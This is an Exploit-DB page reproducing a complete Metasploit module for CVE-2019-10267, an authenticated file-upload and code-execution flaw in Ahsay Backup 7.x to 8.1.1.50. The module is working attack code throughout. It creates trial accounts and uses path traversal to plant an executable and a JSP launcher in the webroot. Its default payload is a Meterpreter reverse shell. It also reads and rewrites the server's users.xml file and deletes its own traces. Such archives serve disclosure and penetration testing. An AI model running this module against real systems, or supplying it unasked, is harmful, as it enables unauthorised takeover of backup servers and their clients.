Ahsay Backup 7.x – 8.1.1.50 – Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)

  • 作者: Wietse Boonstra
    日期: 2019-07-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47180/
  • # Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. (Metasploit)
    # Date: 26-6-2019
    # Exploit Author: Wietse Boonstra
    # Vendor Homepage: https://ahsay.com
    # Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
    # Version: 7.x < 8.1.1.50 (REQUIRED)
    # Tested on: Windows / Linux
    # CVE : CVE-2019-10267
     
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
     
    class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::EXE
    include Msf::Exploit::FileDropper
    include REXML
     
    def initialize(info = {})
    super(update_info(info,
    'Name'=> 'Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload',
    'Description' => %q{
     This module exploits an authenticated insecure file upload and code
     execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute
     the upload credentials are needed, default on Ahsay Backup trial
     accounts are enabled so an account can be created.
     
     It can be exploited in Windows and Linux environments to get remote code
     execution (usualy as SYSTEM). This module has been tested successfully
     on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this
     flaw all connected clients can be configured to execute a command before
     the backup starts. Allowing an attacker to takeover even more systems
     and make it rain shells!
     
     Setting the CREATEACCOUNT to true will create a new account, this is
     enabled by default.
     If credeantials are known enter these and run the exploit.
    },
    'Author' =>
    [
    'Wietse Boonstra'
    ],
    'License' => MSF_LICENSE,
    'References'=>
    [
    [ 'CVE', '2019-10267'],
    [ 'URL', 'https://www.wbsec.nl/ahsay/' ],
    [ 'URL', 'http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe' ]
    ],
    'Privileged'=> true,
    'Platform'=> 'win',
    'DefaultOptions' => {
    'RPORT' => 443,
    'SSL' => true,
    'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
    },
    'Targets' =>
    [
    ['Windows x86',
    {
    'Arch' => ARCH_X86,
    'Platform' => 'win'
    }
    ],
    [ 'Linux x86', # should work but untested
    {
    'Arch' => ARCH_X86,
    'Platform' => 'linux'
    },
    ],
     
    ],
    'DefaultTarget'=> 0,
    'DisclosureDate' => 'Jun 1 2019'))
     
    register_options(
    [
    Opt::RPORT(443),
    OptString.new('TARGETURI', [true, 'Path to Ahsay', '/']),
    OptString.new('USERNAME', [true, 'Username for the (new) account', Rex::Text.rand_text_alphanumeric(8)]),
    OptString.new('PASSWORD', [true, 'Password for the (new) account', Rex::Text.rand_text_alpha(8) + Rex::Text.rand_text_numeric(5) + Rex::Text.rand_char("","!$%^&*")]),
    OptString.new('CREATEACCOUNT', [false, 'Create Trial account', 'false']),
    OptString.new('UPLOADPATH', [false, 'Payload Path', '../../webapps/cbs/help/en']),
     
    ])
    end
     
    def is_trial_enabled?
    res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','isTrialEnabled'),
    'method' => 'POST',
    'data' => ''
    })
    if res and res.code == 200 and "ENABLED" =~ /#{res.body}/
    return true
    else
    return false
    end
    end
     
    def check_account?
    headers = create_request_headers
    res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','getUserProfile'),
    'method' => 'POST',
    'data' => '',
    'headers' => headers
    })
    if res and res.code == 200
    print_good("Username and password are valid!")
    return true
    elsif res and res.code == 500 and "USER_NOT_EXIST" =~ /#{res.body}/
    # fail_with(Failure::NoAccess, 'Username incorrect!')
    print_status("Username does not exist.")
    return false
    elsif res and res.code == 500 and "PASSWORD_INCORRECT" =~ /#{res.body}/
    # fail_with(Failure::NoAccess, 'Username exists but password incorrect!')
    print_status("Username exists but password incorrect!")
    return false
    else
    return false
    end
    end
     
    def create_request_headers
    headers = {}
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    headers['X-RSW-custom-encode-username'] = username
    headers['X-RSW-custom-encode-password'] = password
    headers
    end
     
    def exploit
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
     
    if is_trial_enabled? and datastore['CREATEACCOUNT'] == "true"
    if username == "" or password == ""
    fail_with(Failure::NoAccess, 'Please set a username and password')
    else
    #check if account does not exists?
    if !check_account?
    # Create account and check if it is valid
    if create_account?
    drop_and_execute()
    else
    fail_with(Failure::NoAccess, 'Failed to authenticate')
    end
    else
    #Need to fix, check if account exist
    print_good("No need to create account, already exists!")
    drop_and_execute()
    end
    end
    elsif username != "" and password != ""
    if check_account?
    drop_and_execute()
    else
    if is_trial_enabled?
    fail_with(Failure::NoAccess, 'Username and password are invalid. But server supports trial accounts, you can create an account!')
    end
    fail_with(Failure::NoAccess, 'Username and password are invalid')
    end
    else
    fail_with(Failure::UnexpectedReply, 'Missing some settings')
    end
    end
     
    def create_account?
    headers = create_request_headers
    res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','addTrialUser'),
    'method' => 'POST',
    'data' => '',
    'headers' => headers
    })
    # print (res.body)
    if res and res.code == 200
    print_good("Account created")
    return true
    elsif res.body.include?('LOGIN_NAME_IS_USED')
    fail_with(Failure::NoAccess, 'Username is in use!')
    elsif res.body.include?('PWD_COMPLEXITY_FAILURE')
    fail_with(Failure::NoAccess, 'Password not complex enough')
    else
    fail_with(Failure::UnexpectedReply, 'Something went wrong!')
    end
    end
     
    def remove_account
    if datastore['CREATEACCOUNT']
    username = datastore['USERNAME']
    users_xml = "../../conf/users.xml"
    print_status("Looking for account #{username} in #{users_xml}")
    xml_doc = download(users_xml)
    xmldoc = Document.new(xml_doc)
    el = 0
    xmldoc.elements.each("Setting/Key") do |e|
    el = el + 1
    e.elements.each("Value") do |a|
    if a.attributes["name"].include?('name')
    if a.attributes["data"].include?(username)
    print_good("Found account")
    xmldoc.root.elements.delete el
    print_status("Removed account")
    end
    end
    end
    end
    new_xml = xmldoc.root
    print_status("Uploading new #{users_xml} file")
    upload(users_xml, new_xml.to_s)
    print_good("Account is inaccesible when service restarts!")
    end
    end
     
    def prepare_path(path)
    if path.end_with? '/'
    path = path.chomp('/')
    end
    path
    end
     
    def drop_and_execute()
    path = prepare_path(datastore['UPLOADPATH'])
    exploitpath = path.gsub("../../webapps/cbs/",'')
    exploitpath = exploitpath.gsub("/","\\\\\\")
    requestpath = path.gsub("../../webapps/",'')
     
    #First stage payload creation and upload
    exe = payload.encoded_exe
    exe_filename = Rex::Text.rand_text_alpha(10)
    exefileLocation = "#{path}/#{exe_filename}.exe"
    print_status("Uploading first stage payload.")
    upload(exefileLocation, exe)
    #../../webapps/cbs/help/en
    exec = %Q{<% Runtime.getRuntime().exec(getServletContext().getRealPath("/") + "#{exploitpath}\\\\#{exe_filename}.exe");%>}
     
    #Second stage payload creation and upload
    jsp_filename = Rex::Text.rand_text_alpha(10)
    jspfileLocation = "#{path}/#{jsp_filename}.jsp"
    print_status("Uploading second stage payload.")
    upload(jspfileLocation, exec)
    proto = ssl ? 'https' : 'http'
    url = "#{proto}://#{datastore['RHOST']}:#{datastore['RPORT']}" + normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp")
     
    #Triggering the exploit
    print_status("Triggering exploit! #{url}" )
    res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp"),
    'method' => 'GET'
    })
    if res and res.code == 200
    print_good("Exploit executed!")
    end
     
    #Cleaning up
    print_status("Cleaning up after our selfs.")
    remove_account
    print_status("Trying to remove #{exefileLocation}, but will fail when in use.")
    delete(exefileLocation)
    delete(jspfileLocation)
    delete("../../user/#{datastore['USERNAME']}",true)
    end
     
    def upload(fileLocation, content)
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    uploadPath = Rex::Text.encode_base64(fileLocation)
     
    headers = {}
    headers['X-RSW-Request-0'] = username
    headers['X-RSW-Request-1'] = password
    headers['X-RSW-custom-encode-path'] = uploadPath
    res = send_request_raw({
    'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','upload'),
    'method' => 'PUT',
    'headers' => headers,
    'data' => content,
    'timeout' => 20
    })
    if res && res.code == 201
    print_good("Succesfully uploaded file to #{fileLocation}")
    else
    fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end
    end
     
    def download(fileLocation)
    #TODO make vars_get variable
    print_status("Downloading file")
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    headers = {}
    headers['X-RSW-Request-0'] = username
    headers['X-RSW-Request-1'] = password
    res = send_request_cgi({
    #/obs/obm7/file/download?X-RSW-custom-encode-path=../../conf/users.xml
    'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','download'),
    'method' => 'GET',
    'headers' => headers,
    'vars_get' => {
    'X-RSW-custom-encode-path' => fileLocation
    }
    })
     
    if res and res.code == 200
    res.body
    end
    end
     
    def delete(fileLocation, recursive=false)
    print_status("Deleting file #{fileLocation}")
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    headers = {}
    headers['X-RSW-Request-0'] = username
    headers['X-RSW-Request-1'] = password
    res = send_request_cgi({
    #/obs/obm7/file/delete?X-RSW-custom-encode-path=../../user/xyz
    'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','delete'),
    'method' => 'DELETE',
    'headers' => headers,
    'vars_get' => {
    'X-RSW-custom-encode-path' => fileLocation,
    'recursive' => recursive
    }
    })
     
    if res and res.code == 200
    res.body
    end
    end
     
    def check
    #We need a cookie first
    cookie_res = send_request_cgi({
    #/cbs/system/ShowDownload.do
    'uri' => normalize_uri(target_uri.path, 'cbs','system','ShowDownload.do'),
    'method' => 'GET'
    })
     
    if cookie_res and cookie_res.code == 200
    cookie = cookie_res.get_cookies.split()[0]
    else
    return Exploit::CheckCode::Unknown
    end
     
    if defined?(cookie)
    #request the page with all the clientside software links.
    headers = {}
    headers['Cookie'] = cookie
    link = send_request_cgi({
    #/cbs/system/ShowDownload.do
    'uri' => normalize_uri(target_uri.path, 'cbs','system','download','indexTab1.jsp'),
    'method' => 'GET',
    'headers' => headers
    })
     
    if link and link.code == 200
    link.body.each_line do |line|
    #looking for the link that contains obm-linux and ends with .sh
    if line.include? '<a href="https://www.exploit-db.com/cbs/download/' and line.include? '.sh' and line.include? 'obm-linux'
    filename = line.split("<a")[1].split('"')[1].split("?")[0]
    filecontent = send_request_cgi({
    #/cbs/system/ShowDownload.do
    'uri' => normalize_uri(target_uri.path, filename),
    'method' => 'GET',
    'headers' => headers
    })
    if filecontent and filecontent.code == 200
    filecontent.body.each_line do |l|
    if l.include? 'VERSION="'
    number = l.split("=")[1].split('"')[1]
    if number.match /(\d+\.)?(\d+\.)?(\d+\.)?(\*|\d+)$/
    if number <= '8.1.1.50' and not number < '7'
    return Exploit::CheckCode::Appears
    else
    return Exploit::CheckCode::Safe
    end
    end
    end
    end
    else
    return Exploit::CheckCode::Unknown
    end
    end
    end
    else
    return Exploit::CheckCode::Unknown
    end
    else
    return Exploit::CheckCode::Unknown
    end
     
    end
    end